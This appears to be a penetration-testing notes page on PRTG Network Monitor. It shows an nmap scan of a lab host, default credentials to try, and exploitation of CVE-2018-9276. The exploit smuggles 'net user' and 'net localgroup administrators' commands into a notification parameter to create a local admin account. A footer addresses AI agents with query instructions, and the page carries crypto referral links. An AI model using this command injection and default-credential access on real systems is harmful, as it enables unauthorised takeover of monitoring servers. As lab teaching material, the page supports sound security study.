# PRTG Network Monitor {% embed url="" %} ## Discovery/Footprinting/Enumeration ```shell-session $ sudo nmap -sV -p- --open -T4 10.129.201.50 Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-22 15:41 EDT Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 0.06% done Nmap scan report for 10.129.201.50 Host is up (0.11s latency). Not shown: 65492 closed ports, 24 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 8000/tcp open ssl/http Splunkd httpd 8080/tcp open http Indy httpd 17.3.33.2830 (Paessler PRTG bandwidth monitor) 8089/tcp open ssl/http Splunkd httpd 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49676/tcp open msrpc Microsoft Windows RPC 49677/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 97.17 seconds ``` ### Default credentials `prtgadmin:prtgadmin` Also try: `prtgadmin:Password123` - Else [Brute Force](/0xss0rz/pentest/web-attacks/login-forms-attacks/login-brute-force.md) ### Version ```shell-session $ curl -s http://10.129.201.50:8080/index.htm -A "Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)" | grep version

New PRTG release 21.3.70 with new Azure, HPE, and Redfish sensors

Just a short while ago, I introduced you to PRTG Release 21.3.69, with a load of new sensors, and now the next version is ready for installation. And this version also comes with brand new stuff!

PRTG Network Monitor 17.3.33.2830 ``` ## Known Vulnerabilities [CVE-2018-9276](https://nvd.nist.gov/vuln/detail/CVE-2018-9276) which is an authenticated command injection in the PRTG System Administrator web console for PRTG Network Monitor before version 18.2.39. {% embed url="" %}

`Add new notification`.

Give the notification a name and scroll down and tick the box next to `EXECUTE PROGRAM`. Under `Program File`, select `Demo exe notification - outfile.ps1` from the drop-down. Finally, in the parameter field, enter a command. For our purposes, we will add a new local admin user by entering `test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add`

Click the `Test` button to run our notification and execute the command to add a local admin user ```shell-session $ sudo crackmapexec smb 10.129.201.50 -u prtgadm1 -p Pwn3d_by_PRTG! SMB 10.129.201.50 445 APP03 [*] Windows 10.0 Build 17763 (name:APP03) (domain:APP03) (signing:False) (SMBv1:False) SMB 10.129.201.50 445 APP03 [+] APP03\prtgadm1:Pwn3d_by_PRTG! (Pwn3d!) ``` ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

## Interesting Books {% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %} [Interesting Books](/0xss0rz/interesting-books.md) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more * [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them * [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/prtg-network-monitor.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.